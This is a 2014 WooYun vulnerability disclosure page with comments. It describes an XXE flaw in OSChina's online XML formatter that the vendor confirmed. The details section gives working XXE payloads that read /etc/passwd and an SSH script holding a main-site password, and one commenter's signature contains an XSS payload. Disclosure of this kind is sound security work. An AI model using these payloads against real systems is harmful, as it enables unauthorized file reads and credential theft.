当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059911

漏洞标题:从开源中国的某XXE漏洞到主站shell

相关厂商:开源中国

漏洞作者: 五道口杀气

提交时间:2014-05-08 14:58

修复时间:2014-06-22 14:59

公开时间:2014-06-22 14:59

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-08: 细节已通知厂商并且等待厂商处理中
2014-05-08: 厂商已经确认,细节仅向厂商公开
2014-05-18: 细节向核心白帽子及相关领域专家公开
2014-05-28: 细节向普通白帽子公开
2014-06-07: 细节向实习白帽子公开
2014-06-22: 细节向公众公开

简要描述:

无意间发现的一个XXE,最终可得到主站shell

详细说明:

http://tool.oschina.net/codeformat/xml
格式化xml,白捡了一个漏洞,输入代码:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>
直接读取/etc/passwd文件内容。
读到/home/run/ssh_go.sh
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///home/run/ssh_go.sh">]>
<root><name>&xxe;</name></root>
发现主站登陆ssh的一个用户密码。

漏洞证明:

xxe0.png


xxe1.png


xxe2.png

修复方案:

版权声明:转载请注明来源 五道口杀气@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-08 15:36

厂商回复:

非常可怕的漏洞,已处理

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-08 15:01 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    @五道口杀气 求帝都拜师!

  2. 2014-05-08 15:02 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    我闻到了一股杀气...

  3. 2014-05-08 15:04 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

    好浓的杀气

  4. 2014-05-08 15:08 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    有杀气?

  5. 2014-05-08 15:51 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @蟋蟀哥哥 红薯菊花没了

  6. 2014-05-08 16:13 | 开源中国(乌云厂商)

    @小胖胖要减肥 这个爆菊很痛

  7. 2014-05-08 16:23 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    果断mark 杀气系列

  8. 2014-05-08 17:10 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @开源中国 请问是红薯吗~~

  9. 2014-05-08 17:51 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    xxe漏洞绝佳案例啊

  10. 2014-05-09 16:13 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @开源中国 没有绝对的安全。。。。

  11. 2014-05-09 21:31 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    前排

  12. 2014-06-23 07:39 | 卡农的保镖 ( 路人 | Rank:4 漏洞数:3 | 好)

    我认为拜师应该叫西二旗杀气

  13. 2014-06-24 03:53 | oldsun ( 路人 | Rank:16 漏洞数:4 | 啪啪啪啪啪啪啪啪啪啪啪啪)

    不知道怎么猜到这文件的```

  14. 2014-06-25 09:48 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    这个太犀利了

  15. 2014-10-08 11:41 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    ssh_go.sh,怎么猜到的,难道是bash_history?

  16. 2015-04-20 15:46 | nony ( 路人 | Rank:28 漏洞数:13 | Not do is die...)

    怎么有点像是员工留下的后门呢

  17. 2015-06-14 18:22 | Mark ( 路人 | Rank:8 漏洞数:2 | 渗透你的心)

    我闻到了一股杀气...